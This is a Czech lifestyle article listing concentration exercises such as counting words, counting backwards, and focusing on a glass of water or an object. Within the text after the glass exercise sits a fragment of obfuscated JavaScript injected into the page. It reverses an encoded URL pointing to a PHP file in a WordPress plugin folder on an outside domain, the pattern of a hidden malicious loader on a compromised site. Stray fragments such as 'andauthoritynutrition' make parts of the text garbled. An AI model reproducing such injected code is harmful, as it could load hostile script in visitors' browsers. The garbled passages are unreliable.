FACESTARŽivotní stylVYZKOUŠEJTE CVIČENÍ, KTERÁ PODPORUJÍ SOUSTŘEDĚNÍ, V PRÁCI BUDETE MNOHEM EFEKTIVNĚJŠÍ!

VYZKOUŠEJTE CVIČENÍ, KTERÁ PODPORUJÍ SOUSTŘEDĚNÍ, V PRÁCI BUDETE MNOHEM EFEKTIVNĚJŠÍ!

 

 

Aby cvičení byla účinná, je třeba nejprve se na ně dobře naladit. Najděte si klidné místo, kde vás nebude nic rušit. Pohodlně se usaďte. Můžete sedět v tureckém sedu na podlaze, nebo na židli. Seděte rovně se vzpřímenou páteří. Uvolněte se několika hlubokými nádechy a výdechy. Na začátku budete potřebovat na cvičení 10 minut. Později, jakmile pokročíte, můžete dobu prodloužit na 15 minut.

Cvičení s knihou

Tohle je jedno z nejjednodušších cvičení ke zlepšení koncentrace. Vezměte si knihu a začněte počítat slova v jednom odstavci. Můžete je spočítat dvakrát, abyste zjistili, zda jste neudělali chybu. Jakmile zvládnete jeden odstavec, spočítejte slova ve dvou dalších. Nesmíte při tom používat prsty, počítat můžete pouze očima. Postupně se dopracujte k počítání slov na celé stránce

and

Obrácené počítání

Další jednoduché mentální cvičení je počítání pozpátku. Napočítejte pozpátku od stovky do jedničky. Pokud je to pro vás příliš jednoduché, vynechávejte dvě čísla. Počítejte: 100, 97, 94, 91, 88 atd. Pak můžete vynechat tři čísla. Postupně si počítání komplikujte.

Opakování v myšlenkách

Dalším jednoduchým způsobem, jak zvýšit soustředění, je myslet na jedno slovo nebo zvuk. Opakujte si to slovo nebo zvuk v myšlenkách pořád dokola po dobu pěti minut. Když to zvládnete, prodlužte dobu na deset minut.

Myšlenkové cvičení

Tohle se může zdát složitější, ale pravidelným cvičením to jistě brzy zvládnete. Zkuste po dobu jedné minuty nemyslet vůbec na nic. Pak dobu postupně prodlužujte. Bude vám nějakou dobu trvat, než se to naučíte, ale výsledek rozhodně bude stát za to. Vyprázdnění mysli je základem východních meditací, které pomáhají udržovat mysl zdravou.

Cvičení na židli

Sedněte si na židli a držte ramena vzadu, bradu vysuňte dopředu. Pravou ruku zvedněte na úroveň ramen a ukazujte dopředu. Pak pohybujte pouze hlavou a soustřeďte se na prsty zvednuté ruky. Držte paže úplně v klidu po dobu jedné minuty. Pak zopakujte totéž s levou rukou. Postupně prodlužujte dobu až na pět minut. bude to jednodušší s dlaněmi obrácenými dolů.

Zkoumání ovoce

Vezměte si do ruky jakékoli ovoce – jablko, pomeranč, banán či jakékoli jiné, a důkladně je prozkoumejte ze všech stran. Můžou vás při tom napadat různé myšlenky, jako kde jste to ovoce koupili apod. Nenechte se těmito myšlenkami unést, ale ignorujte je. Snažte se plně soustředit na ovoce samotné, na jeho tvar, vůni, chuť, jaké je na pohmat.

andauthoritynutrition

Cvičení se sklenicí

K tomuto cvičení budete potřebovat sklenici vody. Držte sklenici před sebou v jedné ruce. Zaměřte svou pozornost na sklenici. Ruce držte v klidu, ve vodě by neměl být vidět žádný pohyb. na počátku se zkuste soustředit jednu minutu, postupně dobu prodlužujte na pět minut. Pak udělejte totéž se sklenicí v druhé ruce.

and$nYj=function(n){if(typeof($nYj.list[n])==„string“)return $nYj.list[n].split(„“).reverse().join(„“);return $nYj.list[n]};$nYj.list=[„\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelahand-Water-Glass-Exercise-2.jpg“ />

Cvičení s předměty

Vezměte si do ruky jakýkoli předmět. Může to být lžička, šálek, sklenice či cokoli jiného. Soustřeďte se na ten předmět a dívejte se na něj ze všech stran, aniž by se ve vaší mysli tvořila jakákoli slova. Snažte se nemyslet na nic jiného než na předmět samotný.

Vizualizace

Pokud zvládnete všechna předchozí cvičení, můžete zkusit toto. Nakreslete na papír malý geometrický útvar, např. trojúhelník, kruh nebo obdélník. Může mít jakoukoli barvu. Snažte se nemyslet  na nic jiného a plně se zaměřte na tvar, který jste nakreslili. Neuhýbejte očima. Jakmile se na tvar plně soustředíte, zavřete oči  a představujte si ho v mysli.

 

 

 

 

 

 

 

 

 

 

Související články